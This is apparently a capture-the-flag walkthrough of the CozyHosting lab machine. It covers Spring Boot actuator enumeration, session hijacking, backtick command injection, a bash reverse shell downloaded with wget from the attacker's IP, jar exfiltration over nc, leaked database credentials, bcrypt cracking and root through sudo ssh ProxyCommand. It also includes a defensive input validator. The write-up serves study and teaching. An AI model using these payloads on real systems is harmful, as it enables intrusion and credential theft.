[http-missing-security-headers:referrer-policy] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:clear-site-data] [http] [info] http://cozyhosting.htb
[springboot-mappings] [http] [low] http://cozyhosting.htb/actuator/mappings
[openssh-detect] [tcp] [info] cozyhosting.htb:22 [SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.3]
[spring-detect] [http] [info] http://cozyhosting.htb/error
[waf-detect:nginxgeneric] [http] [info] http://cozyhosting.htb/
[springboot-beans] [http] [low] http://cozyhosting.htb/actuator/beans

Note the actuator directory: this is Spring Boot.

Use dirsearch.

┌──(rootkali)-[/home/kali/jexboss]
└─# dirsearch -u http://cozyhosting.htb -w /usr/share/seclists/Discovery/Web-Content/spring-boot.txt              

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                      
                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 112
Output File: /root/.dirsearch/reports/cozyhosting.htb/_23-10-07_06-37-28.txt
Error Log: /root/.dirsearch/logs/errors-23-10-07_06-37-28.log
Target: http://cozyhosting.htb/
[06:37:29] Starting: 
[06:37:29] 200 -  634B  - /actuator                                         
[06:37:29] 200 -    5KB - /actuator/env                                     
[06:37:29] 200 -  487B  - /actuator/env/path
[06:37:29] 200 -  487B  - /actuator/env/home                                
[06:37:30] 200 -  487B  - /actuator/env/lang                                
[06:37:30] 200 -   15B  - /actuator/health                                  
[06:37:30] 200 -   10KB - /actuator/mappings                                
[06:37:30] 200 -   98B  - /actuator/sessions                                
[06:37:30] 200 -  124KB - /actuator/beans
Task Completed

I have /actuator/sessions:

┌──(rootkali)-[/home/kali/jexboss]
└─# curl http://cozyhosting.htb/actuator/sessions
{"6D3BD4BCE55E6178BBDFA87EEB570468":"kanderson"}     

Enumeration

Use Burp Suite to insert the session ID.

burp

web

Try entering input into the two fields and capture the request with Burp.

command

The Location field in the response returns the result of the connection attempt to me. So can I try command injection to have the server return results to me?

space

Try bypassing without spaces.

ping

Try adding backticks.

ping2

That worked. I will use this method to upload the RCE payload to the machine.

RCE

First, of course, create the RCE payload. Create a file named rce.sh with the IP and port (used for the listener):

bash -c "/bin/bash -i >& /dev/tcp/10.10.14.65/5555 0>&1"

cd to the directory containing the rce.sh above and start a local HTTP server.

┌──(rootkali)-[/home/kali]
└─# python3 -m http.server 2345
Serving HTTP on 0.0.0.0 port 2345 (http://0.0.0.0:2345/) ...

Next, upload the RCE payload to the machine (my VPN IP has changed) with the command:

host=10.10.14.65&username=`wget${IFS}http://10.10.14.65:2345/rce.sh${IFS}-P${IFS}/tmp`

upload

Back to the HTTP server to check:

┌──(rootkali)-[/home/kali]
└─# python3 -m http.server 2345
Serving HTTP on 0.0.0.0 port 2345 (http://0.0.0.0:2345/) ...
10.10.11.230 - - [09/Oct/2023 04:37:38] "GET /rce.sh HTTP/1.1" 200 -

Change the permissions of the RCE file (Burp request):

host=10.10.14.65&username=`chmod${IFS}777${IFS}/tmp/rce.sh`

Create a listener on the attacking machine.

┌──(rootkali)-[/home/kali]
└─# nc -lnvp 5555
listening on [any] 5555 ...

Run the RCE payload:

host=10.10.14.65&username=`bash${IFS}/tmp/rce.sh`

Back to the listener:

┌──(rootkali)-[/home/kali]
└─# nc -lnvp 5555
listening on [any] 5555 ...
connect to [10.10.14.65] from (UNKNOWN) [10.10.11.230] 43542
bash: cannot set terminal process group (1043): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$ id
id
uid=1001(app) gid=1001(app) groups=1001(app)
app@cozyhosting:/app$ 

Note: throughout the RCE process, if the connection drops, reload the sessions page to get kanderson's new session.
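
The root cause here is the application building a shell command line from the host and username fields, so backticks and ${IFS} are interpreted. As an added example that is not the CozyHosting application's code, a bash allow-list validator for those two fields and an invocation that passes them to ssh as an argument vector rather than through a shell; the walkthrough's payload is embedded as a constructed literal to show it being rejected.

```bash
#!/usr/bin/env bash
# Added example, not the CozyHosting application's code. The app interpolated
# the "host" and "username" fields into a shell command, so `...` and ${IFS}
# were interpreted. These helpers allow-list both fields and never hand them
# to a shell.

# POSIX-style usernames only: leading letter or underscore, then [a-z0-9_-],
# at most 32 characters. Anything else (backtick, $, ;, |, &, space) fails.
USER_RE='^[a-z_][a-z0-9_-]{0,31}$'
valid_username() {
    [[ "$1" =~ $USER_RE ]]
}

# Hostnames (dotted labels) or dotted IPv4. A leading "-" is excluded, so a
# value cannot turn into an ssh option such as -oProxyCommand=...
HOST_RE='^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*$'
valid_host() {
    [[ "$1" =~ $HOST_RE ]]
}

# Validate both fields, then build the ssh argument vector as an array and
# print it one word per line. The words never pass through eval or sh -c, so
# even before validation shell metacharacters in them would be inert.
# Returns 1 and prints nothing on bad input.
ssh_argv() {
    local host="$1" user="$2"
    valid_host "$host" && valid_username "$user" || return 1
    local -a argv=(ssh -o BatchMode=yes -o ConnectTimeout=5 -- "${user}@${host}" true)
    printf '%s\n' "${argv[@]}"
}

# Constructed inputs: the legitimate session owner seen in /actuator/sessions,
# and the walkthrough's injection payload kept as a literal (never executed).
GOOD_USER='kanderson'
BAD_USER='`wget${IFS}http://10.10.14.65:2345/rce.sh${IFS}-P${IFS}/tmp`'
```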

SSH

app@cozyhosting:/tmp$ ls /home
ls /home
josh

There is a user named josh.

app@cozyhosting:/app$ ls -la
ls -la
total 58856
drwxr-xr-x  2 root root     4096 Aug 14 14:11 .
drwxr-xr-x 19 root root     4096 Aug 14 14:11 ..
-rw-r--r--  1 root root 60259688 Aug 11 00:45 cloudhosting-0.0.1.jar

Retrieve this jar file and try analysing it.

app@cozyhosting:/app$ nc 10.10.14.65 1234 < cloudhosting-0.0.1.jar
nc 10.10.14.65 1234 < cloudhosting-0.0.1.jar
app@cozyhosting:/app$ 
┌──(rootkali)-[/home/kali]
└─# nc -lnvp 1234 > cloudhosting-0.0.1.jar
listening on [any] 1234 ...
connect to [10.10.14.65] from (UNKNOWN) [10.10.11.230] 33940

Use jadx to open the jar. I found the PostgreSQL database credentials.

postgresql

Back in the RCE shell, log in to the DB.

app@cozyhosting:/tmp$ psql -h localhost -p 5432 -U postgres -d cozyhosting
psql -h localhost -p 5432 -U postgres -d cozyhosting
Password for user postgres: Vg&nvzAQ7XxR

After some digging I found credentials:

kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User 
admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin

Use john to crack this hash.

┌──(rootkali)-[~]
└─# john -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt --format=bcrypt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (admin)     
1g 0:00:00:08 DONE (2023-10-09 10:50) 0.1119g/s 322.5p/s 322.5c/s 322.5C/s mygirl..secrets
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Try logging in over SSH as josh with the password just cracked.

┌──(rootkali)-[~]
└─# ssh josh@10.10.11.230
josh@10.10.11.230's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Oct  9 03:01:09 PM UTC 2023

  System load:           0.0
  Usage of /:            55.4% of 5.42GB
  Memory usage:          36%
  Swap usage:            0%
  Processes:             301
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.230
  IPv6 address for eth0: dead:beef::250:56ff:feb9:9679


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Oct  9 14:32:04 2023 from 10.10.14.106
josh@cozyhosting:~$ id
uid=1003(josh) gid=1003(josh) groups=1003(josh)
josh@cozyhosting:~$ 
josh@cozyhosting:~$ ls 
user.txt

Privilege escalation

josh@cozyhosting:~$ sudo -l
[sudo] password for josh: 
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *

Go to the ssh entry on GTFOBins (https://gtfobins.github.io/gtfobins/ssh/) and get root via sudo:

josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
# ls /root
root.txt
